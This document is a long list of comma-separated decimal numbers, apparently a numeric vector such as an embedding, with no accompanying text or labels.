-0.022199714556336403, 0.00815444067120552, -0.03250867500901222, 0.01869521476328373, 0.03542681783437729, -0.01133167278021574, 0.038481324911117554, -0.07216271013021469, 0.02860872447490692, 0.0009161814232356846, 0.014263453893363476, -0.03076324239373207, -0.06158103048801422, 0.017304323613643646, -0.014481632970273495, -0.00815444067120552, 0.02296334132552147, -0.02915417216718197, -0.021299727261066437, -0.04101765528321266, 0.013015742413699627, 0.03329957276582718, -0.01654069684445858, 0.016922511160373688, 0.021381543949246407, -0.012695292010903358, -0.020986095070838928, -0.03275412693619728, -0.012640747241675854, 0.006814685184508562, -0.03253594785928726, -0.06496280431747437, -0.021517906337976456, -0.05549928918480873, -0.017727045342326164, -0.03496318683028221, -0.0041215382516384125, 0.003565863473340869, 0.010472592897713184, -0.01658160611987114, 0.011283946223556995, 0.040744930505752563, -0.006016968283802271, -0.021095184609293938, 0.003115869127213955, -0.0413176529109478, -0.03550863638520241, 0.021817902103066444, 0.040172211825847626, 0.023604242131114006, -0.05345385894179344, 0.011890756897628307, 0.0073158154264092445, -0.005232887342572212, -0.04933572933077812, 0.006112421862781048, 0.009088519960641861, 0.026154210790991783, 0.03387229144573212, 0.03264503553509712, -0.013724824413657188, 0.01225893385708332, 0.015777070075273514, 0.040308572351932526, -0.030408700928092003, 0.010793043300509453, 0.009538514539599419, 0.003712452482432127, -0.02507695183157921, 0.04276308789849281, -0.03943585976958275, 0.01644524373114109, -0.04388125613331795, -0.021136092022061348, 0.010049871169030666, 0.0322904959321022, 0.0004482897056732327, 0.01257256604731083, -0.034254107624292374, -0.029263261705636978, -0.03981767222285271, 0.02699965424835682, 0.017236143350601196, -0.05918106064200401, 0.023086067289114, 0.017222506925463676, -0.015040716156363487, 0.006634005811065435, -0.044153980910778046, -0.01641797088086605, 0.024340597912669182, 0.0052635688334703445, 0.023045159876346588, -0.003548818174749613, 0.01678614877164364, 0.007868081331253052, 0.022308804094791412, -0.05770835280418396, -0.011699849739670753, 0.009061247110366821, -0.050726622343063354, 0.025158768519759178, -0.01855885237455368, 0.021626995876431465, 0.01236120518296957, 0.006463553290814161, -0.0028073503635823727, 0.018108859658241272, -0.010111234150826931, 0.008420346304774284, 0.0251042228192091, -0.013131650164723396, -0.004298808518797159, 0.03878132253885269, -0.025472400709986687, -0.009756692685186863, 0.06409008800983429, -0.024054236710071564, -0.030054159462451935, 0.017495229840278625, 0.012211207300424576, -0.027204196900129318, 0.004721530247479677, 0.0017556593520566821, 0.0489811897277832, -0.019090663641691208, -0.002735760295763612, 0.029454167932271957, 0.025595126673579216, -0.015927068889141083, -0.0005569530767388642, -0.0124498400837183, 0.00520561495795846, 0.02031792141497135, -0.028226910158991814, -0.046526677906513214, -0.02251334860920906, -0.016117975115776062, 0.04164491966366768, 0.01855885237455368, -0.017577046528458595, -0.046499405056238174, -0.015967976301908493, -0.03084505908191204, -0.001094304141588509, 0.02866326831281185, 0.017031600698828697, -0.017645228654146194, 0.014154364354908466, 0.033763203769922256, -0.015627073124051094, 0.02488604374229908, 0.00808626040816307, -0.000028204538466525264, 0.00919079128652811, -0.0048408471047878265, -0.024013329297304153, -0.019336115568876266, -0.014713447540998459, 0.030135978013277054, -0.038590412586927414, 0.025431491434574127, 0.05359022319316864, -0.012183934450149536, -0.008311256766319275, 0.029481440782546997, -0.01838158257305622, 0.014904354698956013, -0.01460435800254345, -0.007908989675343037, 0.0018306582933291793, -0.031663231551647186, 0.021817902103066444, 0.019908836111426353, -0.017481593415141106, -0.05549928918480873, 0.016963418573141098, -0.0028005323838442564, 0.01664978638291359, 0.04475397244095802, -0.013888458721339703, 0.015217986889183521, -0.013963457196950912, -0.0014795265160501003, -0.042408548295497894, -0.010043052956461906, 0.015845252200961113, -0.0066305967047810555, -0.017208870500326157, 0.004373807460069656, -0.0025789442006498575, 0.0012843585573136806, -0.005365840159356594, -0.013793004676699638, -0.02263607271015644, 0.029481440782546997, -0.014808900654315948, -0.0008820909424684942, -0.0017266824143007398, 0.012886198237538338, 0.06343554705381393, -0.04557214304804802, 0.026031484827399254, -0.035890448838472366, -0.023986056447029114, -0.009224881418049335, -0.02676783874630928, 0.0029522348195314407, -0.007833990268409252, 0.001234075054526329, 0.04082674905657768, 0.00827034842222929, -0.038208600133657455, 0.004820392932742834, 0.006170375272631645, 0.007063545752316713, -0.015667980536818504, 0.008774887770414352, 0.0324268564581871, 0.002686329185962677, -0.03335411846637726, -0.021327000111341476, -0.0247633196413517, -0.012770290486514568, 0.036244988441467285, 0.025949668139219284, 0.021913355216383934, -0.0015144692733883858, 0.014113455079495907, 0.07145363092422485, -0.026031484827399254, -0.007997624576091766, 0.01338391937315464, 0.011706667952239513, -0.010888496413826942, -0.0007197351078502834, -0.006661278195679188, 0.022172443568706512, 0.0025124677922576666, 0.019240662455558777, -0.025826942175626755, 0.003705634269863367, 0.030054159462451935, -0.011849848553538322, 0.00668514147400856, -0.006879457272589207, 0.004673803690820932, 0.014945263043045998, -0.023345155641436577, 0.004622668027877808, -0.009927145205438137, -0.02236334979534149, -0.010840769857168198, 0.002188608283177018, -0.04137219861149788, -0.019077029079198837, -0.00038863139343447983, -0.05157206580042839, -0.03891768306493759, 0.02866326831281185, -0.011904392391443253, -0.01441345177590847, 0.003541999962180853, -0.0249678622931242, -0.021776992827653885, -0.03695407137274742, 0.017945224419236183, -0.0008215803536586463, -0.042190369218587875, 0.04688121750950813, -0.006995365023612976, -0.0038965409621596336, -0.0006609290139749646, -0.0379631482064724, 0.013329374603927135, -0.02255425602197647, 0.03518136590719223, 0.005260159727185965, 0.0497993603348732, 0.014113455079495907, 0.02690420113503933, -0.03234504163265228, 0.0008283984498120844, -0.003478932660073042, -0.0024937179405242205, 0.010090779513120651, 0.019649747759103775, 0.0026454206090420485, 0.03449955955147743, -0.03709043189883232, -0.007097636349499226, -0.025676943361759186, 0.025758760049939156, -0.07892625778913498, 0.014686175622045994, 0.013254375196993351, -0.013568008318543434, 0.029426895081996918, -0.031963225454092026, -0.02485877275466919, -0.008877159096300602, -0.017890680581331253, -0.024176962673664093, 0.021449724212288857, 0.008038532920181751, 0.026154210790991783, -0.00725445244461298, 0.005948787555098534, 0.019186116755008698, 0.03332684561610222, -0.01637706346809864, 0.007029455155134201, -0.020304284989833832, 0.013902094215154648, 0.03474500775337219, -0.042681269347667694, 0.012708928436040878, -0.02680874802172184, 0.008924885652959347, 0.0012477112468332052, 0.0017053758492693305, 0.02866326831281185, -0.010697590187191963, -0.014086183160543442, 0.003610180923715234, -0.025949668139219284, 0.010622590780258179, 0.033817749470472336, 0.007295361254364252, 0.011174856685101986, -0.011727122589945793, 0.007165817078202963, 0.005082889460027218, -0.017740681767463684, 0.01679978519678116, 0.023358792066574097, -0.0030221203342080116, -0.02056337334215641, -0.034335922449827194, -0.00520561495795846, -0.023290609940886497, 0.0012136207660660148, 0.010745316743850708, -0.006995365023612976, 0.02899053692817688, 0.021776992827653885, 0.021136092022061348, 0.044235795736312866, 0.012190752662718296, -0.009074883535504341, -0.04775393381714821, 0.003482341766357422, -0.038154058158397675, -0.017263414338231087, -0.03343593329191208, 0.0068010492250323296, 0.013308919966220856, -0.05159933865070343, -0.0037431337404996157, -0.027395103126764297, 0.018231583759188652, -0.01632251776754856, -0.00041079017682932317, -0.01666342280805111, -0.023290609940886497, -0.01040441170334816, -0.019622474908828735, -0.007554448675364256, -0.008508982136845589, -0.038344964385032654, -0.006743095349520445, -0.010595318861305714, -0.028554178774356842, 0.00826353020966053, -0.03490864485502243, -0.03905404359102249, -0.015245258808135986, -0.009224881418049335, -0.010349866934120655, -0.0032573447097092867, 0.0023846286348998547, -0.02297697775065899, -0.025363311171531677, -0.004445397760719061, 0.00846807286143303, -0.02479059062898159, -0.012722563929855824, -0.031799592077732086, -0.023576971143484116, -0.032263223081827164, 0.009995326399803162, 0.03100869432091713, 0.019186116755008698, -0.0154088931158185, -0.012156662531197071, -0.004428352229297161, 0.026004211977124214, -0.02063155360519886, -0.0012698700884357095, -0.012824835255742073, 0.021722448989748955, -0.03231776878237724, -0.03125414624810219, 0.03488137200474739, 0.010063507594168186, 0.01866794191300869, -0.011011222377419472, -0.0021562224719673395, -0.00027442831196822226, -0.03163595870137215, 0.015286168083548546, -0.004411307163536549, 0.023863330483436584, -0.03856314346194267, -0.017045235261321068, -0.01628161035478115, -0.016022522002458572, -0.03248140215873718, -0.011877120472490788, -0.021640632301568985, -0.013895276002585888, 0.020072469487786293, -0.003644271520897746, 0.005488566122949123, 0.011979391798377037, 0.020154286175966263, 0.0031738230027258396, -0.04150855913758278, 0.005007890518754721, 0.012838471680879593, 0.04139946773648262, 0.005311295390129089, -0.019022483378648758, -0.048926644027233124, 0.03537227213382721, -0.02503604255616665, 0.027695098891854286, 0.019758837297558784, 0.01859976164996624, 0.008052169345319271, -0.0044181253761053085, -0.017958860844373703, -0.04298126697540283, 0.008058987557888031, 0.007752173580229282, -0.0372813418507576, 0.009156701155006886, -0.012020300142467022, 0.01544980239123106, -0.0020761096384376287, -0.0011812348384410143, 0.014781628735363483, -0.005243114661425352, -0.01662251353263855, 0.007765809539705515, 0.024286052212119102, -0.012497566640377045, 0.01651342399418354, 0.025595126673579216, 0.025308767333626747, -0.06452644616365433, -0.019186116755008698, -0.0017778180772438645, 0.005072662141174078, -0.013043014332652092, 0.02299061417579651, -0.004414716269820929, -0.0019192935433238745, 0.0124498400837183, -0.023876966908574104, 0.004598804749548435, 0.011379399336874485, -0.03493591398000717, 0.028281455859541893, -0.06305373460054398, 0.006978319492191076, -0.019895199686288834, 0.015040716156363487, -0.00204883748665452, 0.015040716156363487, 0.019704293459653854, -0.02271789126098156, -0.006272647064179182, 0.005652200430631638, -0.019281571730971336, 0.001377255073748529, -0.00003816534808720462, -0.040444936603307724, 0.022199714556336403, 0.035890448838472366, -0.0027954187244176865, -0.015708889812231064, -0.02271789126098156, 0.007595357019454241, 0.031963225454092026, 0.0017156030517071486, 0.008890795521438122, 0.01256574783474207, 0.03719952329993248, -0.010561227798461914, -0.005127206910401583, -0.04303581267595291, -0.0009681694209575653, 0.016922511160373688, -0.012204389087855816, -0.0005066696321591735, -0.007902171462774277, 0.02498149871826172, 0.002174972090870142, -0.01622706465423107, -0.010813497938215733, -0.0029590530321002007, -0.02858145162463188, -0.011829393915832043, -0.0004137731157243252, 0.012122571468353271, 0.017372503876686096, -0.00940897036343813, -0.03291776031255722, -0.0271905604749918, -0.007281724829226732, -0.04317217320203781, -0.01664978638291359, 0.0011505534639582038, 0.000011159302630403545, 0.0006451621884480119, 0.012511203065514565, -0.005324931815266609, -0.014263453893363476, 0.012743018567562103, -0.02454514056444168, 0.00042165652848780155, -0.0017173074884340167, 0.03905404359102249, 0.019608840346336365, -0.017958860844373703, 0.02710874378681183, 0.040172211825847626, -0.023590607568621635, 0.000584651599638164, -0.036490440368652344, -0.008658980019390583, 0.03313593938946724, 0.014018001966178417, 0.06992637366056442, -0.011611214838922024, 0.025172404944896698, -0.00029765244107693434, 0.04690849035978317, 0.017740681767463684, 0.01460435800254345, -0.003852223278954625, 0.0187770314514637, -0.021367907524108887, 0.01888612098991871, 0.008215803653001785, -0.0027289423160254955, 0.023167883977293968, 0.007090818136930466, 0.007929443381726742, 0.00013178098015487194, -0.011931665241718292, -0.01347255427390337, 0.010806679725646973, 0.023426972329616547, -0.007043091580271721, -0.023331519216299057, 0.006432872265577316, 0.029781436547636986, 0.006354464218020439, -0.013138468377292156, -0.029617801308631897, -0.02513149566948414, -0.02447695843875408, 0.00010887644748436287, 0.03065415285527706, -0.0032334811985492706, -0.015245258808135986, 0.032181404531002045, -0.0025993986055254936, 0.004428352229297161, 0.014058910310268402, -0.027204196900129318, 0.02294970490038395, -0.021981535479426384, 0.019827019423246384, 0.011808939278125763, 0.013895276002585888, -0.019758837297558784, 0.03880859166383743, -0.0202497411519289, -0.046663038432598114, -0.0224724393337965, -0.005362431053072214, -0.021149728447198868, -0.023276973515748978, 0.034172289073467255, -0.030272338539361954, 0.021122455596923828, -0.01820431277155876, 0.0005041128606535494, 0.037881333380937576, 0.004268127027899027, -0.060653768479824066, 0.020004289224743843, 0.015286168083548546, -0.02033155784010887, 0.00362722622230649, 0.0005872083711437881, 0.019322479143738747, -0.0036544986069202423, 0.0063817366026341915, 0.016922511160373688, 0.004568123258650303, -0.0037635881453752518, -0.01879066787660122, 0.0030800742097198963, 0.00521243317052722, -0.017099780961871147, 0.014195272698998451, -0.029399622231721878, 0.000688201398588717, -0.03302684798836708, 0.004571532364934683, -0.017440686002373695, -0.01350664533674717, -0.006749913562089205, 0.02102700248360634, -0.007677174173295498, 0.013990730047225952, -0.002396560274064541, -0.028417818248271942, -0.010731680318713188, 0.02031792141497135, -0.003414160804823041, -0.007513539865612984, -0.041972190141677856, 0.0379631482064724, -0.01041804812848568, 0.012661200948059559, -0.03471773490309715, 0.0028721222188323736, 0.0029454168397933245, -0.04314490035176277, -0.02491331659257412, 0.013731641694903374, -0.00624196557328105, 0.01245665829628706, 0.01636342704296112, -0.01236802339553833, -0.00668514147400856, -0.008024897426366806, -0.014822537079453468, 0.0046669854782521725, 0.02256789244711399, -0.028036003932356834, 0.008229440078139305, -0.02087700553238392, 0.009552150033414364, -0.0000021206669771345332, -0.017304323613643646, 0.0038113147020339966, -0.02506331540644169, -0.006177193485200405, 0.015177078545093536, -0.0007090818253345788, 0.02669965848326683, -0.013520280830562115, 0.023195156827569008, 0.017727045342326164, 0.020086105912923813, 0.012388477101922035, -0.029917798936367035, -0.015722526237368584, -0.03128141537308693, -0.017386140301823616, -0.018163403496146202, -0.03679043799638748, -0.03651771321892738, 0.03092687577009201, -0.011938483454287052, -0.023999692872166634, 0.0013201534748077393, 0.0005578053533099592, -0.013227103278040886, -0.004482896998524666, 0.0013167444849386811, 0.046253953129053116, -0.007697628811001778, -0.012722563929855824, 0.02303152345120907, -0.012415749952197075, 0.031854137778282166, 0.013724824413657188, -0.020304284989833832, -0.010724862106144428, 0.04148128628730774, -0.009443060494959354, 0.006027195602655411, 0.013758914545178413, 0.01030214037746191, -0.03111778199672699, 0.029590530321002007, -0.03706316277384758, -0.00048791986773721874, -0.021613359451293945, -0.0267132930457592, 0.006818094290792942, -0.002819282002747059, -0.010752134956419468, -0.008018079213798046, 0.0028550769202411175, 0.0038897227495908737, 0.009838510304689407, 0.006071513053029776, 0.024067873135209084, 0.02877235785126686, 0.027667827904224396, 0.012933924794197083, -0.0014352088328450918, 0.00807944219559431, -0.023399699479341507, -0.000028843734980910085, 0.02882690355181694, 0.016036158427596092, -0.01617252081632614, 0.015367984771728516, -0.04382671043276787, 0.004864710383117199, 0.012927106581628323, 0.0029931433964520693, -0.046335767954587936, 0.0030851876363158226, -0.011829393915832043, 0.015845252200961113, 0.027695098891854286, -0.012081663124263287, 0.020004289224743843, -0.01659524254500866, -0.006453326437622309, -0.046553947031497955, 0.029617801308631897, -0.019063392654061317, -0.0025039452593773603, -0.02693147212266922, 0.0186406709253788, -0.014195272698998451, -0.001014191540889442, 0.008318074978888035, -0.007540812250226736, -0.026263300329446793, 0.01544980239123106, -0.0051783425733447075, 0.01019986905157566, 0.00008879503002390265, -0.026236027479171753, -0.017999770119786263, -0.007786263711750507, 0.0053897034376859665, -0.009143064729869366, 0.02882690355181694, 0.028554178774356842, -0.00455448729917407, 0.015272531658411026, -0.02506331540644169, -0.01328846625983715, -0.0104316845536232, 0.036081355065107346, -0.013152103871107101, -0.029345078393816948, -0.050372082740068436, 0.007199907675385475, 0.006739686243236065, -0.026372389867901802, -0.01153621543198824, -0.02484513632953167, -0.012531657703220844, -0.00818853173404932, -0.023454245179891586, -0.015763433650135994, 0.03466319292783737, 0.022076990455389023, 0.015831615775823593, -0.0008778296760283411, 0.020236104726791382, 0.012320296838879585, 0.010874860920011997, 0.04189037159085274, 0.00815444067120552, -0.004346535075455904, -0.00417949166148901, 0.012838471680879593, -0.0083794379606843, -0.0039442675188183784, 0.0076567200012505054, -0.05159933865070343, 0.002691442845389247, -0.03583590313792229, 0.002773259999230504, -0.042190369218587875, -0.03447228670120239, 0.013888458721339703, -0.03250867500901222, -0.023195156827569008, -0.008127168752253056, -0.0093203354626894, -0.017727045342326164, -0.014331634156405926, 0.013643006794154644, -0.011733940802514553, 0.004513578489422798, -0.010997585952281952, 0.013002105988562107, -0.007520358078181744, -0.01888612098991871, 0.017658865079283714, -0.012040754780173302, 0.00714536290615797, -0.01674523949623108, -0.0019073619041591883, 0.009238517843186855, 0.0031516640447080135, 0.0041215382516384125, 0.010002144612371922, 0.005737426225095987, 0.010527137666940689, 0.007424904964864254, 0.00048323243390768766, -0.0048442562110722065, -0.025417856872081757, -0.002706783590838313, -0.01144758053123951, -0.014672539196908474, 0.00846807286143303, 0.009463515132665634, -0.015136169269680977, 0.009647603146731853, 0.00409426586702466, 0.011045312508940697, 0.009688512422144413, 0.019827019423246384, -0.005509020294994116, 0.015681616961956024, -0.007752173580229282, -0.005713562946766615, 0.0007465813541784883, -0.014999807812273502, 0.017808862030506134, -0.023931510746479034, 0.0077385371550917625, 0.0332450270652771, -0.005924924276769161, -0.0047556208446621895, 0.007683992385864258, -0.010663500055670738, 0.03927222266793251, 0.015967976301908493, -0.00679082190617919, 0.034226834774017334, 0.00942260678857565, -0.005185160785913467, -0.021245181560516357, -0.0030732559971511364, -0.0028567814733833075, 0.01842249184846878, -0.0008914658683352172, 0.0018817940726876259, -0.052990227937698364, 0.006013559177517891, -0.0019244072027504444, -0.014590722508728504, -0.027436012402176857, 0.014113455079495907, 0.015572527423501015, -0.011474852450191975, -0.0039442675188183784, 0.023495152592658997, 0.00938851572573185, -0.0265769325196743, 0.013206648640334606, -0.048572104424238205, -0.030245067551732063, 0.019772473722696304, -0.006671505514532328, -0.021804265677928925, -0.013745278120040894, -0.007874898612499237, -0.003473819000646472, -0.03989948704838753, -0.024067873135209084, -0.002698260825127363, -0.002763032680377364, -0.030463246628642082, 0.0335177518427372, -0.0069271838292479515, -0.004223809577524662, -0.03518136590719223, 0.005945378448814154, -0.012933924794197083, 0.03275412693619728, 0.0054817479103803635, 0.002524399431422353, -0.006835139822214842, -0.01033623144030571, -0.008536254055798054, 0.003429501550272107, 0.008427164517343044, 0.005972650833427906, 0.005120388697832823, -0.023249702528119087, -0.00916351843625307, -0.007983988150954247, 0.025799669325351715, -0.011686214245855808, 0.02498149871826172, -0.018245220184326172, 0.02893599309027195, -0.03327229991555214, -0.018177039921283722, 0.007690810598433018, 0.005082889460027218, -0.008556708693504333, -0.004356762394309044, -0.00669195968657732, 0.011018040589988232, -0.029590530321002007, 0.00917033664882183, -0.04169946536421776, -0.006047649774700403, 0.019186116755008698, -0.031826864928007126, -0.006831730715930462, -0.044644881039857864, 0.010356685146689415, -0.014986171387135983, -0.015995249152183533, 0.0333813913166523, 0.03248140215873718, 0.004066993482410908, 0.01358846202492714, 0.00363404443487525, 0.015395257622003555, 0.02457241155207157, 0.02923598885536194, -0.012729382142424583, -0.0306814257055521, 0.003862450597807765, 0.022131534293293953, 0.014549813233315945, -0.019008846953511238, 0.0029249624349176884, 0.015831615775823593, 0.021626995876431465, -0.014849809929728508, 0.009818055666983128, -0.009695330634713173, 0.007881716825067997, 0.017236143350601196, -0.01441345177590847, 0.02877235785126686, 0.008093077689409256, 0.019840653985738754, -0.004036311991512775, 0.00679764011874795, 0.012736200354993343, -0.034090470522642136, 0.012811199761927128, -0.044944878667593, -0.005822652485221624, -0.034035928547382355, -0.00232837931253016, 0.009224881418049335, 0.04295399412512779, 0.006616960745304823, -0.03689952567219734, -0.027695098891854286, -0.013247556984424591, 0.01460435800254345, -0.01034304965287447, 0.006668096408247948, -0.007049909792840481, -0.017549775540828705, 0.03458137437701225, -0.004015857819467783, 0.03924494981765747, -0.029917798936367035, 0.009020338766276836, -0.017563411965966225, -0.010574864223599434, -0.011018040589988232, 0.024258779361844063, -0.02266334556043148, 0.006934002041816711, -0.022254260256886482, -0.012429386377334595, -0.030408700928092003, -0.001673842198215425, -0.011918028816580772, 0.003149959724396467, 0.02259516529738903, 0.014713447540998459, 0.011570306494832039, -0.0012229956919327378, 0.003335752757266164, 0.02046792022883892, -0.009572604671120644, -0.002705079037696123, -0.015681616961956024, 0.002406787360087037, -0.00942260678857565, -0.01684069260954857, 0.0022959932684898376, 0.029535984620451927, -0.00715899933129549, 0.012408931739628315, -0.021831538528203964, -0.013827095739543438, 0.046663038432598114, -0.003974949009716511, -0.008658980019390583, -0.04519033059477806, 0.004973799921572208, -0.01336346473544836, 0.008645343594253063, -0.0059862867929041386, -0.015040716156363487, 0.014127091504633427, -0.011822575703263283, 0.029672347009181976, 0.05198115110397339, -0.03561772406101227, -0.019581567496061325, -0.008972612209618092, 0.009988508187234402, 0.007411268539726734, -0.004874937701970339, -0.0027971232775598764, -0.0020045198034495115, -0.017958860844373703, -0.008113532327115536, -0.017672501504421234, 0.025622399523854256, 0.00363063532859087, 0.010479411110281944, 0.0032334811985492706, 0.0018834986258298159, 0.0027306468691676855, 0.019840653985738754, 0.0008829432190395892, -0.017263414338231087, 0.010111234150826931, 0.009743057191371918, -0.014563449658453465, 0.017127053812146187, 0.013172558508813381, 0.009143064729869366, 0.02458604797720909, -0.005035162903368473, -0.002544853836297989, -0.015613435767591, -0.010281686671078205, 0.0023590605705976486, 0.005198797211050987, -0.019486114382743835, -0.0006136284791864455, 0.010479411110281944, -0.034254107624292374, -0.01233393233269453, -0.03479955345392227, 0.005188569892197847, -0.013233921490609646, 0.02243153005838394, 0.0032300723250955343, -0.010370321571826935, -0.024122418835759163, 0.025813305750489235, -0.040063124150037766, -0.035944994539022446, 0.0010082257213070989, 0.009920326992869377, 0.008338529616594315, -0.0025755350943654776, 0.007336269598454237, -0.00028508156538009644, -0.013411191292107105, -0.004591986536979675, 0.015558890998363495, 0.011849848553538322, -0.003934040665626526, -0.014836173504590988, -0.0208633691072464, -0.017917951568961143, 0.021354271098971367, -0.007990806363523006, 0.0124498400837183, -0.034008655697107315, 0.00007206938607851043, 0.013868004083633423, -0.013629370369017124, 0.014904354698956013, 0.010036234743893147, 0.002688033739104867, -0.018040677532553673, -0.008563526906073093, 0.031854137778282166, 0.004772665910422802, -0.005082889460027218, 0.005805607419461012, -0.015927068889141083, 0.010090779513120651, 0.0005352204316295683, 0.006374918390065432, 0.007765809539705515, -0.007411268539726734, 0.03128141537308693, -0.038181327283382416, -0.020208831876516342, 0.01449526846408844, -0.009968054480850697, -0.00772490119561553, 0.05378112941980362, -0.000002839763055817457, 0.0008279723115265369, 0.012681655585765839, -0.021081548184156418, 0.015122533775866032, -0.034145016223192215, 0.014563449658453465, 0.01227257028222084, -0.009224881418049335, 0.008597617037594318, 0.04388125613331795, 0.009681694209575653, -0.023208793252706528, 0.008140805177390575, -0.0072339982725679874, 0.027436012402176857, 0.0067124138586223125, 0.020208831876516342, 0.01249074935913086, 0.011965755373239517, -0.0006332304910756648, -0.00715218111872673, -0.02270425483584404, -0.03125414624810219, -0.0011488489108160138, -0.0031397324055433273, 0.005594246555119753, 0.0036579077132046223, -0.023481518030166626, -0.017781591042876244, -0.008018079213798046, 0.017945224419236183, -0.009872600436210632, -0.006156739313155413, -0.025417856872081757, -0.014945263043045998, -0.005890833679586649, 0.023849694058299065, 0.03889041021466255, 0.003709043376147747, 0.004987435881048441, -0.01144758053123951, 0.006006740964949131, 0.00009065934864338487, 0.03779951483011246, -0.020290648564696312, -0.0004572384641505778, 0.01461799442768097, -0.007111272308975458, 0.006409008521586657, 0.009497605264186859, 0.015736162662506104, 0.019022483378648758, 0.003032347420230508, -0.008856704458594322, 0.004871528595685959, -0.004803347401320934, 0.04175401106476784, -0.005239705555140972, -0.005328340921550989, -0.007036273367702961, 0.024217871949076653, -0.003185754641890526, -0.005324931815266609, -0.02701329067349434, -0.033926837146282196, -0.022254260256886482, 0.013738459907472134, 0.046417586505413055, -0.015149805694818497, 0.022676981985569, -0.019922472536563873, 0.00918397307395935, 0.0066237784922122955, 0.009749875403940678, -0.05918106064200401, -0.002693147398531437, -0.03744497522711754, 0.004619258921593428, 0.010943041183054447, -0.006821503397077322, -0.02495422586798668, 0.01876339502632618, -0.011290764436125755, -0.004070402588695288, 0.017986133694648743, 0.021967900916934013, -0.01861339807510376, -0.003702225163578987, 0.0043328991159796715, 0.0102271419018507, -0.012674837373197079, -0.006347646005451679, -0.027886006981134415, -0.009006702341139317, -0.0056862905621528625, -0.007329451385885477, -0.014358907006680965, -0.003214731579646468, 0.026004211977124214, 0.012824835255742073, -0.01340437401086092, 0.0021664495579898357, -0.004141992423683405, 0.0029454168397933245, 0.0414540134370327, 0.05004481226205826, 0.003487455192953348, 0.017017964273691177, -0.006436280906200409, -0.008229440078139305, 0.031799592077732086, 0.005461293738335371, -0.013683915138244629, 0.022199714556336403, -0.013663461431860924, 0.011911210604012012, 0.019936108961701393, 0.013977093622088432, -0.014658902771770954, -0.009729420766234398, 0.017427049577236176, -0.016008885577321053, -0.008515800349414349, -0.023726968094706535, 0.0020062243565917015, -0.023945147171616554, -0.02912689931690693, 0.006545370444655418, 0.025254221633076668, -0.013922548852860928, -0.0206588264554739, 0.010936223901808262, 0.04129038006067276, 0.026181481778621674, -0.01868157833814621, 0.007220361847430468, 0.02064519003033638, -0.006957865320146084, -0.003410751698538661, -0.013349829241633415, -0.022308804094791412, -0.000290195137495175, 0.006187420804053545, -0.0007069511921145022, 0.0030221203342080116, 0.017986133694648743, 0.0016150361625477672, 0.006565825082361698, -0.03231776878237724, -0.013002105988562107, -0.001458219951018691, -0.012906652875244617, -0.00013881214545108378, 0.003330639097839594, -0.00522606959566474, -0.01891339384019375, -0.001605661236681044, 0.0017335005104541779, -0.0015033897943794727, 0.009674875997006893, -0.011911210604012012, 0.0059896958991885185, -0.01872248761355877, -0.03057233616709709, 0.005335158668458462, -0.02487240917980671, -0.006640824023634195, -0.014945263043045998, -0.010656681843101978, 0.023495152592658997, -0.003480637213215232, -0.01673160307109356, 0.017399776726961136, 0.01637706346809864, 0.004741984885185957, 0.0012221434153616428, -0.015108897350728512, -0.0012724269181489944, 0.007179453503340483, 0.012586202472448349, -0.02095882222056389, -0.02664511278271675, -0.015299803577363491, 0.00017556593229528517, -0.013002105988562107, -0.03171777352690697, 0.009627149440348148, -0.0021476997062563896, -0.005597655661404133, 0.046308498829603195, -0.012095299549400806, 0.0037976785097271204, 0.0035249548964202404, 0.017740681767463684, -0.02860872447490692, -0.023426972329616547, 0.013193013146519661, 0.004820392932742834, -0.017795225605368614, -0.002452809363603592, 0.0027323514223098755, -0.011563488282263279, 0.030408700928092003, -0.009013520553708076, 0.005526065360754728, 0.015163442119956017, -0.023740604519844055, -0.03329957276582718, 0.02271789126098156, 0.038072239607572556, -0.0056862905621528625, 0.006838548928499222, 0.009593058377504349, 0.02264970913529396, -0.02504967898130417, 0.004605622962117195, 0.004874937701970339, -0.019377024844288826, 0.0009622036013752222, 0.008099895901978016, 0.03340866416692734, 0.015095260925590992, -0.0035283637698739767, -0.024136053398251534, 0.021995171904563904, -0.005614700727164745, 0.009995326399803162, 0.01043850276619196, 0.007472631521522999, 0.013193013146519661, 0.004206764046102762, 0.00007681009446969256, -0.018190676346421242, -0.007452177349478006, 0.008590798825025558, -0.0037329066544771194, 0.007383996155112982, 0.015749797224998474, 0.005307886283844709, -0.018967939540743828, -0.02281334437429905, -0.0167588759213686, -0.004285172559320927, -0.006831730715930462, 0.04262672737240791, -0.010908951051533222, -0.007520358078181744, 0.005791970994323492, 0.013854367658495903, 0.015067989006638527, 0.03943585976958275, 0.002919849008321762, -0.017672501504421234, 0.012040754780173302, 0.03264503553509712, 0.009558968245983124, -0.0379631482064724, -0.01551798265427351, 0.026058757677674294, -0.023576971143484116, -0.01892703026533127, 0.009620331227779388, 0.029726890847086906, 0.012695292010903358, 0.003199390834197402, -0.011890756897628307, -0.013118013739585876, 0.033763203769922256, -0.007213544100522995, -0.002674397546797991, -0.01431799866259098, -0.019581567496061325, 0.00771126477047801, 0.0019942927174270153, 0.0006592245190404356, -0.009068065322935581, -0.021763358265161514, 0.010765771381556988, -0.019145209342241287, -0.010090779513120651, 0.0038965409621596336, -0.0038044967222958803, 0.010036234743893147, 0.01124985609203577, -0.030408700928092003, -0.009613513015210629, -0.02239062264561653, -0.020277012139558792, -0.026413297280669212, -0.03073596954345703, -0.004769257269799709, -0.003862450597807765, 0.028472362086176872, -0.00927942618727684, -0.021531542763113976, 0.01821794919669628, 0.02483149990439415, -0.019786110147833824, 0.0065896883606910706, -0.011154402047395706, 0.009081701748073101, -0.009027156978845596, 0.023522425442934036, 0.008488527499139309, -0.0014718561433255672, -0.00011111362982774153, 0.011372581124305725, -0.02260880172252655, -0.02090427838265896, 0.027558738365769386, 0.01682705618441105, 0.01442708820104599, 0.0038215420208871365, -0.019527021795511246, -0.02477695420384407, 0.033790476620197296, 0.006432872265577316, 0.0208633691072464, 0.027858734130859375, -0.00818171352148056, 0.010615772567689419, -0.0072271800599992275, -0.02034519426524639, 0.009456696920096874, 0.020017925649881363, -0.017931587994098663, 0.006524916272610426, -0.009218063205480576, 0.0026590568013489246, -0.021749721840023994, -0.006166966166347265, -0.0062896921299397945, 0.01337710116058588, 0.004946527536958456, -0.0009229995193891227, 0.03117232769727707, 0.009620331227779388, -0.002766441786661744, 0.02689056470990181, 0.005802198313176632, 0.00726127065718174, -0.011788485571742058, 0.0013943002559244633, -0.023481518030166626, -0.0104316845536232, -0.01855885237455368, 0.02447695843875408, -0.014863445423543453, -0.000764904951211065, 0.00362722622230649, 0.017113417387008667, -0.012586202472448349, -0.02300425060093403, -0.008590798825025558, 0.00941578857600689, -0.01666342280805111, -0.0167588759213686, 0.028417818248271942, -0.00029147352324798703, 0.017863407731056213, 